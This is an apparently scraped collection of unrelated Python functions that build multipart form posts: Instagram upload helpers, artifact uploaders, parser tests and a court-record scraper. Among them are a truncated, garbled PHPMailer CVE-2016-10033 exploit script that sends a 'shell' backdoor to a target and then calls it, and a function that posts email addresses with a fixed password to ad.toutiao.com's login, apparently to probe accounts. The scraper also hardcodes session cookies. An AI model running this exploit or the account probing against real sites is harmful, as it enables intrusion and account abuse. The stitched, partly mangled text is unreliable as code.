def save(self,cnxml): """Push new cnxml to RME""" data = MultipartEncoder(fields={'importFile':('index.cnxml', cnxml.decode('utf-8')), 'format':'plain', 'submit':'Import', 'form.submitted':'1', 'came_from':'module_text'}) r = requests.post('%s/module_import_form' % self.url, data = data.to_string(), auth = self.auth, headers = {'Content-Type': data.content_type})
def postold(csrfmiddle, cookie, mail): url = "https://ad.toutiao.com/old_login/" files = { "csrfmiddlewaretoken":(None, str(csrfmiddle)), "email":(None, str(mail)), "password":(None, "9090"), } from requests_toolbelt import MultipartEncoder m = MultipartEncoder(fields=files, boundary="----WebKitFormBoundaryRgFdemk5CNNZaY6j") headers = { 'Accept':'*/*', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.8,zh;q=0.6', 'Connection':'keep-alive', 'Content-Type':m.content_type, 'Host':'ad.toutiao.com', 'Cookie':cookie, 'Origin':'https://ad.toutiao.com', 'Referer':'https://ad.toutiao.com/old_login/', 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36', 'X-Requested-With':'XMLHttpRequest', } r = ss.post(url, headers=headers, data=m.to_string(), verify=False) pp = json.loads(r.text) #print pp if pp['code'] == 1009: print mail, "....", r.text
def upload_photo(self, photo, caption=None, upload_id=None): if upload_id is None: upload_id = str(int(time.time() * 1000)) if not compatible_aspect_ratio(get_image_size(photo)): self.logger.info('Photo does not have a compatible ' 'photo aspect ratio.') return False data = { 'upload_id': upload_id, '_uuid': self.uuid, '_csrftoken': self.token, 'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}', 'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'}) } m = MultipartEncoder(data, boundary=self.uuid) self.session.headers.update({'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'close', 'User-Agent': self.user_agent}) response = self.session.post( config.API_URL + "upload/photo/", data=m.to_string()) if response.status_code == 200: if self.configure_photo(upload_id, photo, caption): self.expose() return True return False
def _upload_artifact(self, local_artifact, path_prefix, repo_id, hostname_for_download=None, use_direct_put=False): filename = os.path.basename(local_artifact.local_path) logger.info('-> Uploading %s', filename) logger.debug('local artifact: %s', local_artifact) # rgavf stands for repo-group-local_artifact-version-filename gavf = '{group}/{name}/{ver}/{filename}'.format(group=local_artifact.group.replace('.', '/'), name=local_artifact.artifact, ver=local_artifact.version, filename=filename) rgavf = '{repo_id}/{gavf}'.format(repo_id=repo_id, gavf=gavf) with open(local_artifact.local_path, 'rb') as f: if not use_direct_put: data = { 'g':local_artifact.group, 'a':local_artifact.artifact, 'v':local_artifact.version, 'r':repo_id, 'e': local_artifact.extension, 'p': local_artifact.extension, 'hasPom': 'false' } data_list = data.items() data_list.append( ('file', (filename, f, 'text/plain') )) m_for_logging = MultipartEncoder(fields=data_list) logger.debug('payload: %s', m_for_logging.to_string()) f.seek(0) m = MultipartEncoder(fields=data_list) headers = {'Content-Type': m.content_type} self._send('service/local/artifact/maven/content', method='POST', data=m, headers=headers) result = RemoteArtifact(group=local_artifact.group, artifact=local_artifact.artifact, version=local_artifact.version, classifier=local_artifact.classifier, extension=local_artifact.extension, repo_id=repo_id) self.resolve_artifact(result) return result else: headers = {'Content-Type': 'application/x-rpm'} remote_path = '{path_prefix}/{rgavf}'.format(path_prefix=path_prefix, rgavf=rgavf) self._send(remote_path, method='PUT', headers=headers, data=f) # if not specified, use repository url hostname_for_download = hostname_for_download or self._repository_url url = '{hostname}/content/repositories/{rgavf}'.format(hostname=hostname_for_download, rgavf=rgavf) # get classifier and extension from nexus path = 'service/local/repositories/{repo_id}/content/{gavf}?describe=maven2'.format(repo_id=repo_id, gavf=gavf) maven_metadata = self._send_json(path)['data'] return RemoteArtifact(group=maven_metadata['groupId'], artifact=maven_metadata['artifactId'], version=maven_metadata['version'], classifier=maven_metadata.get('classifier', ''), extension=maven_metadata.get('extension', ''), url=url, repo_id=repo_id)
def test_post_file_error(self): file = StringIO('sample_name\tbarcode\nSample 1\t000000001\n') m = MultipartEncoder( fields={ 'sample-set': 'Sample Set 1', 'type': 'test', 'location': 'the freezer', 'file': ('test_bc.txt', file, 'text/plain')} ) self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0) obs = self.post('/sample/add/', m.to_string(), headers={'Content-Type': m.content_type}) self.assertEqual(obs.code, 200) self.assertIn('The object with name \'Sample 1\' already exists in ' 'table \'sample\'', obs.body.decode('utf-8')) self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0)
def test_post_file(self): file = StringIO('sample_name\tother_col\ntest1\tval1\ntest2\tval2\n') m = MultipartEncoder( fields={ 'sample-set': 'Sample Set 1', 'type': 'test', 'location': 'the freezer', 'file': ('test_bc.txt', file, 'text/plain')} ) self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 0) obs = self.post('/sample/add/', m.to_string(), headers={'Content-Type': m.content_type}) self.assertEqual(obs.code, 200) self.assertIn('Created 2 samples from test_bc.txt', obs.body.decode('utf-8')) self.assertEqual(len(pm.sample.Sample.search(sample_type='test')), 2)
def detect_face(): file = request.files['file'] file.save('input.jpg') test1 = shrink_img(cv2.imread('input.jpg')) gray_img = cv2.cvtColor(test1, cv2.COLOR_BGR2GRAY) haar_face_cascade = cv2.CascadeClassifier('lbpcascade_frontalface.xml') faces = haar_face_cascade.detectMultiScale(gray_img, scaleFactor=1.2, minNeighbors=5) t1_start = time.time() for (x, y, w, h) in faces: cv2.rectangle(test1, (x, y), (x + w, y + h), (0, 255, 0), 2) cv2.imwrite('output.jpg', test1) faces_json = json.dumps(faces.tolist()) fields = {} fields['image'] = ('output.jpg', open('output.jpg', 'rb'), 'image/jpeg') fields['face_rects'] = ('face_rects', faces_json, 'application/json') m = MultipartEncoder(fields) return Response(m.to_string(), mimetype=m.content_type)
def test_case_insensitive_content_type(): content_type_header = 'Content-Type' for header_key in ( content_type_header, content_type_header.lower(), content_type_header.upper(), 'cOnTeNt-tYPe', ): target = ValueTarget() encoder = MultipartEncoder(fields={'value': 'hello world'}) parser = StreamingFormDataParser( headers={header_key: encoder.content_type}) parser.register('value', target) parser.data_received(encoder.to_string()) assert target.value == b'hello world'
def test_chunked_single(): expected_value = 'hello world' target = ValueTarget() encoder = MultipartEncoder(fields={'value': expected_value}) body = encoder.to_string() parser = StreamingFormDataParser( headers={'Content-Type': encoder.content_type} ) parser.register('value', target) index = body.index(b'world') parser.data_received(body[:index]) parser.data_received(body[index:]) assert target.value == expected_value.encode('utf-8')
def uploadPhoto(self, photo, caption=None, upload_id=None): if upload_id is None: upload_id = str(int(time.time() * 1000)) data = { 'upload_id': upload_id, '_uuid': self.uuid, '_csrftoken': self.token, 'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}', 'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', { 'Content-Transfer-Encoding': 'binary' }) } m = MultipartEncoder(data, boundary=self.uuid) self.s.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'close', 'User-Agent': self.USER_AGENT }) response = self.s.post(self.API_URL + "upload/photo/", data=m.to_string()) self.logger.debug(".uploadPhoto response: status=%s content=%s", response.status_code, response.content) if response.status_code == 200: configure_result = self.configure(upload_id, photo, caption) self.logger.debug(".uploadPhoto configure response: %s", configure_result) if configure_result: expose_result = self.expose() self.logger.debug(".uploadPhoto expose response: %s", expose_result) return False
def uploadPhoto(self, photo, caption=None, upload_id=None): if upload_id is None: upload_id = str(int(time.time() * 1000)) if not compatibleAspectRatio(getImageSize(photo)): self.logger.info('Not compatible photo aspect ratio') return False data = { 'upload_id': upload_id, '_uuid': self.project.get_uuid(), '_csrftoken': self.token, 'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}', 'photo': ('pending_media_%s.jpg' % upload_id, open(photo, 'rb'), 'application/octet-stream', { 'Content-Transfer-Encoding': 'binary' }) } m = MultipartEncoder(data, boundary=self.project.get_uuid()) self.s.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'close', 'User-Agent': settings.NOIRE['USER_AGENT'] }) response = self.s.post(settings.NOIRE['API_URL'] + "upload/photo/", data=m.to_string()) if response.status_code == 200: if self.configurePhoto(upload_id, photo, caption): self.expose() return True return False
def upload_photo(self, photo, caption=None, upload_id=None, from_video=False): if upload_id is None: upload_id = str(int(time.time() * 1000)) if not from_video: photo = resize_image(photo) if not photo: return False if not compatible_aspect_ratio(get_image_size(photo)): self.logger.info('Photo does not have a compatible ' 'photo aspect ratio.') return False with open(photo, 'rb') as f: photo_bytes = f.read() data = { 'upload_id': upload_id, '_uuid': self.uuid, '_csrftoken': self.token, 'image_compression': '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}', 'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes, 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'}) } m = MultipartEncoder(data, boundary=self.uuid) self.session.headers.update({'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'close', 'User-Agent': self.user_agent}) response = self.session.post( config.API_URL + "upload/photo/", data=m.to_string()) if response.status_code == 200: if self.configure_photo(upload_id, photo, caption): self.expose() from os import rename rename(photo, "{}.REMOVE_ME".format(photo)) return True return False
def change_profile_pix(self, input_name, filename, file_address): self.uuid = self.generate_uuid(False) url_change_profile_pix = self.url_change_profile_pix data = {input_name: (filename + '.jpg', open(file_address, 'rb'), 'image/jpeg')} m = MultipartEncoder(data, boundary=self.uuid) self.s.headers.update({'Content-Type': 'multipart/form-data; boundary=' + self.uuid}) r = self.s.post(url_change_profile_pix, data=m.to_string()) all_data = json.loads(r.text) changed = False if "changed_profile" in all_data: if all_data["changed_profile"]: changed = True if changed: log_text = "Profile Pix Successfully Changed" returnValue = True else: log_text = "Profile Pix Upload Failed!" returnValue = False print(log_text) self.s.headers.update({'Content-Type': self.default_content_type}) return returnValue
def test_content_type_passed_to_target(): filename = 'image-600x400.png' with open_dataset(filename) as dataset_: expected_data = dataset_.read() target = ValueTarget() with open_dataset(filename) as file_: encoder = MultipartEncoder( fields={filename: (filename, file_, 'image/png')}) parser = StreamingFormDataParser( headers={'Content-Type': encoder.content_type}) parser.register(filename, target) parser.data_received(encoder.to_string()) assert target.value == expected_data assert target.multipart_content_type == 'image/png'
def parse7(self, response): #with open("pacer_html5555.html",'w') as f1: # f1.write(response.body)valign="top" list1=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[@valign="top"]') #list1=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]') for li in list1: #print li.extract() try: case_number=li.xpath('td[1]/a//text()').extract()[0] case_name=li.xpath('td[1]/b/text()').extract()[0] except: case_number="" case_name="" link=li.xpath('td[@align="center"]/a/@href').extract()[0] codes=li.xpath('td[@align="center"]/a/@onclick').extract()[0] description=", ".join(li.xpath('td[4]//text()').extract()) date_filed=li.xpath('td[2]/text()').extract()[0] #print case_number,case_name,link,codes,description,date_filed #link=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]/td[3]/a/@href').extract()[0] #codes=response.xpath('//*[@id="cmecfMainContent"]/center[1]/table/tr[2]/td[3]/a/@onclick').extract()[0] #print link, codes code1=codes.split('(')[1].split(',')[1].replace("'","").replace('"','').replace(" ","") code2=codes.split('(')[1].split(',')[2].replace("'","").replace('"','').replace(" ","") code3=codes.split('(')[1].split(',')[5].replace("'","").replace('"','').replace(" ","") form_data={'caseid':code1, 'de_seq_num':code2, 'got_receipt':'1', 'pdf_toggle_possible':code3} me = MultipartEncoder(fields=form_data) me_boundary = me.boundary[2:] #need this in headers me_length = me.len #need this in headers me_body = me.to_string() header={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary, 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'} req=scrapy.Request(link, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse8, method="POST") req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"} req.meta['pdfname']=response.meta['base_url'].split('/')[2].replace('.','_')+"_"+code1+"_"+code2+"_"+code3+".pdf" req.meta['base_url']=response.meta['base_url'] req.meta['case_number']=case_number req.meta['case_name']=case_name req.meta['description']=description req.meta['date_filed']=date_filed req.meta['form_data']=form_data yield req
def get_model(model_id): """ Try to download a specific model if allowed. Args: model_id (str) : model's id. Returns: Response : If allowed, returns serialized model. """ # If not Allowed check = mm.is_model_copy_allowed(model_id) response = {} if not check["success"]: # If not allowed if check["error"] == mm.MODEL_NOT_FOUND_MSG: status_code = 404 # Not Found response["error"] = mm.Model_NOT_FOUND_MSG else: status_code = 403 # Forbidden response["error"] = mm.NOT_ALLOWED_TO_DOWNLOAD_MSG return Response(json.dumps(response), status=status_code, mimetype="application/json") # If allowed result = mm.get_serialized_model_with_id(model_id) if result["success"]: # Use correct encoding response = { "serialized_model": result["serialized_model"].decode("ISO-8859-1") } # If model is large split it in multiple parts if sys.getsizeof(response["serialized_model"]) >= MODEL_LIMIT_SIZE: form = MultipartEncoder(response) return Response(form.to_string(), mimetype=form.content_type) else: return Response(json.dumps(response), status=200, mimetype="application/json")
def test_chunked_multiple(): expected_first_value = 'foo' * 1000 expected_second_value = 'bar' * 1000 expected_third_value = 'baz' * 1000 first = ValueTarget() second = ValueTarget() third = ValueTarget() encoder = MultipartEncoder( fields={ 'first': expected_first_value, 'second': expected_second_value, 'third': expected_third_value, } ) body = encoder.to_string() parser = StreamingFormDataParser( headers={'Content-Type': encoder.content_type} ) parser.register('first', first) parser.register('second', second) parser.register('third', third) chunks = [] size = 100 while len(body): chunks.append(body[:size]) body = body[size:] for chunk in chunks: parser.data_received(chunk) assert first.value == expected_first_value.encode('utf-8') assert second.value == expected_second_value.encode('utf-8') assert third.value == expected_third_value.encode('utf-8')
def test_send_mail(self, mock_send_mail_handler): # PREPARE DATA template = "accounts_change_password" url_reverse = reverse('api:mail-list') params = { "name": faker.name(), "public_url": faker.url(), "recipients": [faker.email()], } data = { "template": template, "params": json.dumps(params), "lang": "en", } m = MultipartEncoder(fields=data) # DO ACTION response = self.client.post(url_reverse, data=m.to_string(), content_type=m.content_type) # ASSERTS self.assertTrue(status.is_success(response.status_code)) self.assertTrue(mock_send_mail_handler.called)
def _replace_at(self, name, value): """ Replace the part for the given name with the given value and return the multipart data as a string. The original parts are not changed. :param name: name as string :param value: value as string :return: multipart data as string """ # copy parts = deepcopy(self._parts) # replace text if isinstance(parts[name], list): parts[name][1] = value else: parts[name] = value # encode encoder = MultipartEncoder(parts, boundary=self._boundary) replacement = encoder.to_string().decode() return replacement
def test_basic_multiple(): first = ValueTarget() second = ValueTarget() third = ValueTarget() encoder = MultipartEncoder( fields={'first': 'foo', 'second': 'bar', 'third': 'baz'} ) parser = StreamingFormDataParser( headers={'Content-Type': encoder.content_type} ) parser.register('first', first) parser.register('second', second) parser.register('third', third) parser.data_received(encoder.to_string()) assert first.value == b'foo' assert second.value == b'bar' assert third.value == b'baz'
def upload_media(self, input_name, filename, mention, media_comment): self.uuid = self.generate_uuid(False) url_upload = self.url_upload upload_id = str(int(time.time() * 1000)) data = { "upload_id": upload_id, input_name: (input_name+'.jpg', open(filename, 'rb'), 'image/jpeg') } m = MultipartEncoder(data, boundary=self.uuid) self.s.headers.update({'Content-Type': 'multipart/form-data; boundary='+self.uuid}) self.s.headers.update({'Referer': 'https://www.instagram.com/create/style/'}) r = self.s.post(url_upload, data=m.to_string()) all_data = json.loads(r.text) trueAggregate = 0 if "upload_id" in all_data: upload_id = all_data["upload_id"] print('UPLOAD ID: '+str(upload_id)) trueAggregate += 1 all_data = self.add_caption(upload_id, mention) print(all_data) if len(all_data) > 0: user_id = all_data["media"]["caption"]["user_id"] media_id_user_id = all_data["media"]["id"] media_id = str(media_id_user_id).replace("_"+str(user_id), "") if(len(media_id) > 0): trueAggregate += 1 self.like(media_id) do_comment = self.comment(media_id, media_comment) print(do_comment) self.default_headers() if trueAggregate == 2: return True else: return False else: #self.keep_following = False print('Media caption configuration failed. So comment was added') self.comment(upload_id, mention) return True
def do_test(self, data, dataset_name): useful_numbers = get_useful_numbers() idx = 0 for file_size in chain([ 0, ], useful_numbers): idx += 1 original_data = data[0:file_size] with BytesIO(data[0:file_size]) as dataset_: fields = { 'file': ('file.dat', dataset_, 'binary/octet-stream') } encoder = MultipartEncoder(fields=fields) content_type = encoder.content_type multipart_data = encoder.to_string() self.subTest(idx, 'DifferentFileSizes.' + dataset_name, 1024, original_data, content_type, multipart_data, 'file.dat') self.assertEqual(idx, len(useful_numbers) + 1)
def upload_record_without_photo(self, record): """ 不带自拍,上传跑步记录 """ m = MultipartEncoder( fields={ 'userId': str(self.studentID), 'duration': str(record.duration), 'date': str(record.date), # 后端好像会根据日期来判断是否重复发包 'detail': json.dumps(record.detail), # 路径似乎并不会用来查重 'misc': json.dumps({"agent": "Android v1.2+"}), 'step': str(record.step), }) # self.logger.debug(record.__dict__) # self.logger.debug(m.to_string()) # 注意! m.to_string() 只能输出一次,第二次将会输出空字节,因此不要用这个方法来调试! # return respJson = self.post("record/{userId}".format(userId=self.studentID), data=m.to_string(), headers={'Content-Type': m.content_type}, auth=self.auth) if not respJson["data"]["verified"]: raise PKURunnerNotVerifiedError( "record is not verified, check your running params setting.")
def add_employee(self, emp_id, first_name, last_name, file=None): resp = self.sess.get(f'{BASE_URL}/pim/addEmployee') result = re.search('value="(.*)" id="csrf_token"', resp.text) csrf_token = result.group(1) data = { 'firstName': first_name, 'lastName': last_name, 'employeeId': emp_id, 'status': 'Enabled', 'empNumber': emp_id, '_csrf_token': csrf_token } if file: data.update( {'photofile': ('profile', open(file, 'rb'), 'image/png')}) mpe = MultipartEncoder(fields=data) header = {'Content-Type': mpe.content_type} return self.sess.post(f'{BASE_URL}/pim/addEmployee', headers=header, data=mpe.to_string())
def uploadPhoto(s,id,photo): id=str(id) s.debug_print('attempting to upload %s to event %s' %( id, photo)) url = s.api_url + 'photos.json' files = { 'token': (None, s.token), 'event_id': (None, id), 'image': (photo, open(photo,'rb'),mimetypes.guess_type(photo)[0])} #need to use MultipartEncoder to properly set boundary. #this isn't necessary, and it works without this boundary, #but this is what 2.6.9.6 uses as their setting, so I figured #it couldn't hurt. Useragent also matches :) m = MultipartEncoder(files,boundary='-----------------------------28947758029299') headers = {'User-Agent':'RestSharp/105.2.3.0', 'Content-Type': m.content_type,} r = requests.post(url,headers=headers,data=m.to_string()) #print r.headers #print r.text print r.content return
def login_post(self): captcha = self.get_captcha() time_span = str(int(time.time() * 1000)) data = { "client_id": "c3cef7c66a1843f8b3a9e6a1e3160e20", "grant_type": "password", "timestamp": time_span, "source": "com.zhihu.web", "signature": self.encry_signature(time_span), "username": "******" + self.phonenumber, "password": self.password, "captcha": captcha, "lang": "en", "ref_source": "homepage", "utm_source": "" } boundary = self.random_boundary() encode_data = MultipartEncoder(data, boundary=boundary) self.session.headers["Content-Type"] = encode_data.content_type if self.session.cookies.get("_xsrf", None): self.session.headers["X-Xsrftoken"] = self.session.cookies.get( "_xsrf") if self.session.cookies.get("d_c0", None): self.session.headers["X-UDID"] = self.session.cookies.get( "d_c0").split("|")[0].strip('"') login_url = "https://www.zhihu.com/api/v3/oauth/sign_in" r = self.session.post(login_url, data=encode_data.to_string()) result = r.json() if not result.get("error", None): print(result) return True else: print(result.get("error").get("message")) return False
def putAttachments(self, rowId, manifest: Sequence["OdkxLocalFile"], data: List[bytes]): """ :param manifest: ex. FilesystemAttachmentStore().getManifest(rowId) :param data: list of byte arrays """ fields = { f"{srv.filename}": (f"{srv.filename}", d, srv.contentType or "image/jpg", { "Name": "file" }) for srv, d in zip(manifest, data) } multi_image = MultipartEncoder(fields=fields) for part in multi_image.parts: # this is fix for odkx-sync-endpoint using custom content disposition "file" part.headers = part.headers.replace(b"form-data;", b"file;") #didn't get it to work as stream payload = multi_image.to_string() return self.connection.POST( self.getTableDefinitionRoot() + "/attachments/" + rowId + "/upload", data=payload, headers={"Content-Type": multi_image.content_type})
def connection_speed_test(): """Connection speed test.""" response_body = {} status_code = None try: _worker_id = request.args.get("worker_id", None) _random = request.args.get("random", None) _is_ping = request.args.get("is_ping", None) if not _worker_id or not _random: raise PyGridError # If GET method if request.method == "GET": if _is_ping is None: # Download data sample (64MB) data_sample = b"x" * 67108864 # 64 Megabyte response = {"sample": data_sample} form = MultipartEncoder(response) return Response(form.to_string(), mimetype=form.content_type) else: status_code = 200 # Success elif request.method == "POST": # Otherwise, it's POST method status_code = 200 # Success except PyGridError as e: status_code = 400 # Bad Request response_body[RESPONSE_MSG.ERROR] = str(e) except Exception as e: status_code = 500 # Internal Server Error response_body[RESPONSE_MSG.ERROR] = str(e) return Response(json.dumps(response_body), status=status_code, mimetype="application/json")
) print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com") print( " Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n" ) target = 'http://*****:*****@protonmail.com', 'message': 'Pwned' } m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe') headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type} proxies = {'http': 'localhost:8081', 'https': 'localhost:8081'} print('[+] SeNdiNG eVIl SHeLL To TaRGeT....') r = requests.post(target, data=m.to_string(), headers=headers) print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D') r = requests.get(target + backdoor, headers=headers) if r.status_code == 200: print('[+] ExPLoITeD ' + target)
def parse8(self, response): #with open("pacer_html101010102.html",'w') as f1: # f1.write(response.body) try: if "".join(response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/b//text()').extract()).replace(' ','').replace('\n','').replace('\t','').replace('\r','').lower().find('documentnumber')>-1: url=response.xpath('//*[@id="cmecfMainContent"]/table/tr[1]/td[1]/a/@href').extract()[0] form_data=response.meta['form_data'] me = MultipartEncoder(fields=form_data) me_boundary = me.boundary[2:] #need this in headers me_length = me.len #need this in headers me_body = me.to_string() header={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'multipart/form-data; charset=utf-8; boundary=' + me_boundary, 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'} if url.find('http')>-1: req=scrapy.Request(url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST") else: req=scrapy.Request(response.meta['base_url'].rstrip('/')+url, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=me_body, headers=header, callback=self.parse9, method="POST") req.cookies={'_ga':'GA1.2.1437274789.1534401822', 'ClientValidation':"", 'ClientCodeDescription':"", 'MENU':'slow', 'PacerSession':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'NextGenCSO':'0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q', 'PacerClientCode':'Lumina', 'PacerClient':"", 'ClientDesc':"", 'PacerPref':"receipt=Y"} req.meta['pdfname']=response.meta['pdfname'] req.meta['base_url']=response.meta['base_url'] req.meta['case_number']=response.meta['case_number'] req.meta['case_name']=response.meta['case_name'] req.meta['description']=response.meta['description'] req.meta['date_filed']=response.meta['date_filed'] #req.meta['code_number']=response.meta['code_number'] req.meta['initial_url']=response.meta['initial_url'] yield req else: #print "else part of parse8" try: pdflink=response.meta['base_url'].rstrip('/')+response.xpath('//iframe/@src').extract()[0] requsturl=scrapy.http.Request(pdflink,headers={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'}, callback=self.parse10) requsturl.meta['pdfname']=response.meta['pdfname'] requsturl.meta['base_url']=response.meta['base_url'] requsturl.meta['case_number']=response.meta['case_number'] requsturl.meta['case_name']=response.meta['case_name'] requsturl.meta['description']=response.meta['description'] requsturl.meta['date_filed']=response.meta['date_filed'] yield requsturl #print pdflink except: with open(response.meta['pdfname'],'wb') as f1: f1.write(response.body) item=PacerItems() item['pdflink']="Saved_pdf" item['base_url']=response.meta['base_url'] item['case_number']=response.meta['case_number'] item['case_name']=response.meta['case_name'] item['description']=response.meta['description'] item['date_filed']=response.meta['date_filed'] #item['base_court_name']=response.meta['base_court_name'] yield item except: if response.body.find('%PDF')==0: #print "PDF FOUND" with open(response.meta['pdfname'],'wb') as f1: f1.write(response.body) item=PacerItems() item['pdflink']="Saved_pdf" item['base_url']=response.meta['base_url'] item['case_number']=response.meta['case_number'] item['case_name']=response.meta['case_name'] item['description']=response.meta['description'] item['date_filed']=response.meta['date_filed'] #item['base_court_name']=response.meta['base_court_name'] yield item
def upload_video(self, video, thumbnail, caption=None, upload_id=None): if upload_id is None: upload_id = str(int(time.time() * 1000)) data = { 'upload_id': upload_id, '_csrftoken': self.token, 'media_type': '2', '_uuid': self.uuid, } m = MultipartEncoder(data, boundary=self.uuid) self.session.headers.update({'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Host': 'i.instagram.com', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': m.content_type, 'Connection': 'keep-alive', 'User-Agent': self.user_agent}) response = self.session.post(config.API_URL + "upload/video/", data=m.to_string()) if response.status_code == 200: body = json.loads(response.text) upload_url = body['video_upload_urls'][3]['url'] upload_job = body['video_upload_urls'][3]['job'] with open(video, 'rb') as video_bytes: video_data = video_bytes.read() # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method request_size = len(video_data) // 4 last_request_extra = len(video_data) - 3 * request_size headers = copy.deepcopy(self.session.headers) self.session.headers.update({ 'X-IG-Capabilities': '3Q4=', 'X-IG-Connection-Type': 'WIFI', 'Cookie2': '$Version=1', 'Accept-Language': 'en-US', 'Accept-Encoding': 'gzip, deflate', 'Content-type': 'application/octet-stream', 'Session-ID': upload_id, 'Connection': 'keep-alive', 'Content-Disposition': 'attachment; filename="video.mov"', 'job': upload_job, 'Host': 'upload.instagram.com', 'User-Agent': self.user_agent }) for i in range(4): start = i * request_size if i == 3: end = i * request_size + last_request_extra else: end = (i + 1) * request_size length = last_request_extra if i == 3 else request_size content_range = "bytes {start}-{end}/{len_video}".format( start=start, end=end - 1, len_video=len(video_data)).encode('utf-8') self.session.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range}) response = self.session.post(upload_url, data=video_data[start:start + length]) self.session.headers = headers if response.status_code == 200: if self.configure_video(upload_id, video, thumbnail, caption): self.expose() return True return False
